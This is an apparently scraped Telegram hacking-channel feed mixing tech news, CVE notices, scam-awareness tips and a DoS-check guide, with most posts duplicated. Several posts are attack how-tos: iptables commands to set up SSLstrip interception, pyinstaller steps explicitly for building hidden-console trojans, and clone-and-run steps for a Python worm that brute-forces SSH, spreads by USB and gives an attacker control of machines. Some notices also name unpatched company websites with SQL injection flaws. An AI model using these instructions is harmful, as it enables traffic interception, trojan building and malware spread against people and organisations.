Forwarded from UNDERCODE NEWS
"Focus on Japanese market" and CEO DX of the US Box and tailwind "de-PPAP"
#International
#International
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦random hacking tips
SSLstrip
To use SSLstrip, use the following command to enable it in iptables:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
This makes so that all traffic coming to port 80, which is the default port of HTTP websites, will instead be redirected to port 10000, which is the port the SSLstrip tool uses.
In order to use packet-modifying tools together with SSLstrip, they must be configured to watch for port 10000 instead of 80 and commands below need to be entered into Linux shell:
iptables -I INPUT -j NFQUEUE --queue-num <number>
iptables -I OUTPUT -j NFQUEUE --queue-num <number>
π¦Executable files
Converting scripts into executables :
It's important to note we focus on creating Windows executables, since for both Linux and macOS, the problem becomes trivial, since both operating systems have Python installed by default, therefore allowing us to directly run Python scripts. Another problem is that on Linux, obfuscating such executable file is almost impossible -
Despite all those differences between systems, pyinstaller should work on each one of them anyway.
π¦On Windows
In order to package Python scripts into executable files, you need to have "pyinstaller" installed and you have to run the following command:
pyinstaller <script_name.py> --onefile --noconsole
You might need to use a path to pyinstaller instead, if it's not added to PATH.
--onefile argument ensures all the required libraries and files are put into single executable.
--noconsole argument disables console, so when we run the program, no terminal shows up. Please note that some Python scripts may require "stdin", "stdout" and "stderr" to be handled properly (it is handled in our program).
The created executable can be found in the "dist" folder.
To package multiple files together with the Python script (used for creating trojans), use:
--add-data "abs/path/to/file;."
This is especially useful when creating trojans. The dot means the file will be stored (after running) in a default temp directory. Can be changed to directory of preference.
On Linux
If you need to create .exe file from a Linux machine (not recommended - it's better to do it natively), you need a
Python interpreter in it's Windows version. In order to do that, Wine is required (should be installed by default on Kali Linux).
After you've got both Python downloaded and Wine installed, type in the following command:
wine msiexec /i <python_installer_file>
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦random hacking tips
SSLstrip
To use SSLstrip, use the following command to enable it in iptables:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
This makes so that all traffic coming to port 80, which is the default port of HTTP websites, will instead be redirected to port 10000, which is the port the SSLstrip tool uses.
In order to use packet-modifying tools together with SSLstrip, they must be configured to watch for port 10000 instead of 80 and commands below need to be entered into Linux shell:
iptables -I INPUT -j NFQUEUE --queue-num <number>
iptables -I OUTPUT -j NFQUEUE --queue-num <number>
π¦Executable files
Converting scripts into executables :
It's important to note we focus on creating Windows executables, since for both Linux and macOS, the problem becomes trivial, since both operating systems have Python installed by default, therefore allowing us to directly run Python scripts. Another problem is that on Linux, obfuscating such executable file is almost impossible -
Despite all those differences between systems, pyinstaller should work on each one of them anyway.
π¦On Windows
In order to package Python scripts into executable files, you need to have "pyinstaller" installed and you have to run the following command:
pyinstaller <script_name.py> --onefile --noconsole
You might need to use a path to pyinstaller instead, if it's not added to PATH.
--onefile argument ensures all the required libraries and files are put into single executable.
--noconsole argument disables console, so when we run the program, no terminal shows up. Please note that some Python scripts may require "stdin", "stdout" and "stderr" to be handled properly (it is handled in our program).
The created executable can be found in the "dist" folder.
To package multiple files together with the Python script (used for creating trojans), use:
--add-data "abs/path/to/file;."
This is especially useful when creating trojans. The dot means the file will be stored (after running) in a default temp directory. Can be changed to directory of preference.
On Linux
If you need to create .exe file from a Linux machine (not recommended - it's better to do it natively), you need a
Python interpreter in it's Windows version. In order to do that, Wine is required (should be installed by default on Kali Linux).
After you've got both Python downloaded and Wine installed, type in the following command:
wine msiexec /i <python_installer_file>
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Elbrusov will be generated 20 times less than Baikal in 2021, but the developers do not consider this a loss.
#Technologies
#Technologies
Forwarded from UNDERCODE NEWS
Amazon begs the court not to order the resumption of social network web hosting facilities by Parler.
#International
#International
Forwarded from DailyCVE
π΅An unpatched SQL injection vulnerability exists in the website of Wuxi Huyi Technology:
https://dailycve.com/unpatched-sql-injection-vulnerability-exists-website-wuxi-huyi-technology
https://dailycve.com/unpatched-sql-injection-vulnerability-exists-website-wuxi-huyi-technology
Dailycve
An unpatched SQL injection vulnerability exists in the website of Wuxi Huyi Technology | CVE
Details:
Wuxi Huyi Technology Co., Ltd. is a competent service provider with simple Internet applications. The business has focused on building knowledge for small to medium-sized businesses, encouraging enterprises to set up their own Internet network marketingβ¦
Wuxi Huyi Technology Co., Ltd. is a competent service provider with simple Internet applications. The business has focused on building knowledge for small to medium-sized businesses, encouraging enterprises to set up their own Internet network marketingβ¦
Forwarded from DailyCVE
π΅Changzhou Manhao Information Technology Co., Ltd. website has SQL injection vulnerability:
https://dailycve.com/changzhou-manhao-information-technology-co-ltd-website-has-sql-injection-vulnerability
https://dailycve.com/changzhou-manhao-information-technology-co-ltd-website-has-sql-injection-vulnerability
Dailycve
Changzhou Manhao Information Technology Co., Ltd. website has SQL injection vulnerability | CVE
Details:
Changzhou Manhao Technology Information Co., Ltd. Method of Building
Established in 2007, Manhao is a Golden Globe Company affiliate. It has been committed to strengthening the reputation of customer products for several years and helpingβ¦
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top scams :
1) Text messaging scam
Be careful with phone messages.
SMS Text Messages From Microsoft - Genuine or Phishing?
Some, claiming that you have won a huge amount of money, etc., are trying to cheat you.
You can also receive these messages, such as from a bank, PayPal or Apple or any well-known brand.
This could be a different type of phishing.
Tips: Don't click on the link, even if it looks like a link from a bank or PayPal, etc.
Do not call the numbers listed. Contact your bank and let them know about the incident.
2) Scammers in technical support
These are the biggest consumer scams at the moment.
This mainly applies to the elderly.
You may receive an unsolicited call from a person who claims to be from Microsoft technical support or any other technical support provider, asking for permission to access your computer and saying that your computer may be infected with viruses or other malware.
Tips: just hang up and don't trust them.
Neither Microsoft nor any technical support team will call you that way.
3) Income tax fraud
You may receive a call / email from a person allegedly owned by the tax authority stating that you have some unpaid taxes and threaten that if you do not pay the full amount due immediately by bank transfer, they will file a lawsuit and etc.
Tips: Don't call that person. Do not transfer money or make payments in a panic.
Call the tax hotline and tell them about the problem.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top scams :
1) Text messaging scam
Be careful with phone messages.
SMS Text Messages From Microsoft - Genuine or Phishing?
Some, claiming that you have won a huge amount of money, etc., are trying to cheat you.
You can also receive these messages, such as from a bank, PayPal or Apple or any well-known brand.
This could be a different type of phishing.
Tips: Don't click on the link, even if it looks like a link from a bank or PayPal, etc.
Do not call the numbers listed. Contact your bank and let them know about the incident.
2) Scammers in technical support
These are the biggest consumer scams at the moment.
This mainly applies to the elderly.
You may receive an unsolicited call from a person who claims to be from Microsoft technical support or any other technical support provider, asking for permission to access your computer and saying that your computer may be infected with viruses or other malware.
Tips: just hang up and don't trust them.
Neither Microsoft nor any technical support team will call you that way.
3) Income tax fraud
You may receive a call / email from a person allegedly owned by the tax authority stating that you have some unpaid taxes and threaten that if you do not pay the full amount due immediately by bank transfer, they will file a lawsuit and etc.
Tips: Don't call that person. Do not transfer money or make payments in a panic.
Call the tax hotline and tell them about the problem.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from DailyCVE
π΅Patch for Adobe Experience Manager cross-site scripting vulnerability:
https://dailycve.com/patch-adobe-experience-manager-cross-site-scripting-vulnerability
https://dailycve.com/patch-adobe-experience-manager-cross-site-scripting-vulnerability
Dailycve
Patch for Adobe Experience Manager cross-site scripting vulnerability | CVE
Details:
Forwarded from DailyCVE
π΅Adobe Experience Manager blind server-side request forgery vulnerability patch:
https://dailycve.com/adobe-experience-manager-blind-server-side-request-forgery-vulnerability-patch
https://dailycve.com/adobe-experience-manager-blind-server-side-request-forgery-vulnerability-patch
Dailycve
Adobe Experience Manager blind server-side request forgery vulnerability patch | CVE
Details:
Forwarded from UNDERCODE NEWS
AMD CEO: Appleβs M1 chip leads creativity, GPU collaboration between the two sides will continue.
#International #Technologies
#International #Technologies
Forwarded from UNDERCODE NEWS
A T-shirt sold on Amazon was titled βTrump was titledβ
#International
#International
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ How to quickly check if your Linux server is under DoS attack from a single IP address ?
A) What do you need
The only thing you need to do this is a Linux server and a user with sudo privileges.
I will be demonstrating on Ubuntu Server 20.04.
We are going to use the netstat tool to find out what IPs are currently connected to your server.
To install netstat on Ubuntu, you actually install net-tools, for example:
> sudo apt-get install net-tools -y
If you are using CentOS or a Red Hat based installation, netstat should already be installed.
B) How to check your server load
The first thing we're going to do is check the load on our server.
The command we will use for this will return the number of logical processors (threads).
On the server, this number should be pretty low, but it depends on what you are running.
If you know everything is in order, make sure your number is off the charts and record the number.
If you suspect something is happening, run the flow check again and compare the results.
To check the number of logical processors, enter the command:
grep processor / proc / cpuinfo | wc -l
> If this number is significantly higher than your baseline, you may be in trouble.
For example, on my Pop! _OS I have 16 threads, but on a Nextcloud hosted Ubuntu server I only have two.
If any of these numbers doubled, I could be exposed to a DDoS attack.
C) How to check the load on your network
Next, we will check the load on our network.
It can be done with a number of tools, but I choose nload.
To install nload, enter the command:
sudo apt-get install nload -y
On CentOS, this command would be:
sudo dnf install nload -y
To run the tool, just enter the command:
nload
If this load is significantly higher than you think, you may be attacked.
How to find out which IP addresses are connected to your server
The next thing you need to do is find out which IPs are connected to your server.
For this we will use netstat like this:
netstat -ntu | awk '{print $ 5}' | cut -d: -f1 -s | sort | uniq -c | sort -nk1 -r
The output from the above command will list each IP address connected to the server and the number of instances of each.
Be sure to review this list carefully. If you see an IP address with a large number of instances (over 100), the chances of the address being the culprit for the load are pretty high.
Once you are sure of culpability, you can block the IP address with the command:
> sudo route add ADDRESS reject
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ How to quickly check if your Linux server is under DoS attack from a single IP address ?
A) What do you need
The only thing you need to do this is a Linux server and a user with sudo privileges.
I will be demonstrating on Ubuntu Server 20.04.
We are going to use the netstat tool to find out what IPs are currently connected to your server.
To install netstat on Ubuntu, you actually install net-tools, for example:
> sudo apt-get install net-tools -y
If you are using CentOS or a Red Hat based installation, netstat should already be installed.
B) How to check your server load
The first thing we're going to do is check the load on our server.
The command we will use for this will return the number of logical processors (threads).
On the server, this number should be pretty low, but it depends on what you are running.
If you know everything is in order, make sure your number is off the charts and record the number.
If you suspect something is happening, run the flow check again and compare the results.
To check the number of logical processors, enter the command:
grep processor / proc / cpuinfo | wc -l
> If this number is significantly higher than your baseline, you may be in trouble.
For example, on my Pop! _OS I have 16 threads, but on a Nextcloud hosted Ubuntu server I only have two.
If any of these numbers doubled, I could be exposed to a DDoS attack.
C) How to check the load on your network
Next, we will check the load on our network.
It can be done with a number of tools, but I choose nload.
To install nload, enter the command:
sudo apt-get install nload -y
On CentOS, this command would be:
sudo dnf install nload -y
To run the tool, just enter the command:
nload
If this load is significantly higher than you think, you may be attacked.
How to find out which IP addresses are connected to your server
The next thing you need to do is find out which IPs are connected to your server.
For this we will use netstat like this:
netstat -ntu | awk '{print $ 5}' | cut -d: -f1 -s | sort | uniq -c | sort -nk1 -r
The output from the above command will list each IP address connected to the server and the number of instances of each.
Be sure to review this list carefully. If you see an IP address with a large number of instances (over 100), the chances of the address being the culprit for the load are pretty high.
Once you are sure of culpability, you can block the IP address with the command:
> sudo route add ADDRESS reject
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from DailyCVE
π΅Patch for Dell Wyse ThinOS authorization issue vulnerability:
https://dailycve.com/patch-dell-wyse-thinos-authorization-issue-vulnerability
https://dailycve.com/patch-dell-wyse-thinos-authorization-issue-vulnerability
Dailycve
Patch for Dell Wyse ThinOS authorization issue vulnerability | CVE
Details:
Dell Wyse ThinOS is a dedicated Dell Cloud Operating System from Dell (Dell). ThinOS 8.6 and previous versions of Dell Wyse have security bugs, and this flaw can be exploited by attackers to access writable files and exploit the configurationβ¦
Forwarded from DailyCVE
π΅Fix for the weakness of Adobe Photoshop heap buffer overflow:
https://dailycve.com/fix-weakness-adobe-photoshop-heap-buffer-overflow
https://dailycve.com/fix-weakness-adobe-photoshop-heap-buffer-overflow
Dailycve
Fix for the weakness of Adobe Photoshop heap buffer overflow | CVE
Details:
Adobe Photoshop, known as 'PS', is a platform for image editing developed and distributed by Adobe. Adobe Photoshop 22.1 and older releases provide the vulnerability of heap buffer overload. Attackers can run arbitrary code using this vulnerability.β¦
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE TESTING
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Python network worm that spreads on the local network and gives the attacker control of these machines:
You can bruteforce ssh servers, spread with USBs, etc..
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/pylyf/NetWorm.git
2) cd NetWorm
3) python worm.py
You can bruteforce ssh servers, spread with USBs, etc..
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Python network worm that spreads on the local network and gives the attacker control of these machines:
You can bruteforce ssh servers, spread with USBs, etc..
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/pylyf/NetWorm.git
2) cd NetWorm
3) python worm.py
You can bruteforce ssh servers, spread with USBs, etc..
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - pylyf/NetWorm: Python network worm that spreads on the local network and gives the attacker control of these machines.
Python network worm that spreads on the local network and gives the attacker control of these machines. - pylyf/NetWorm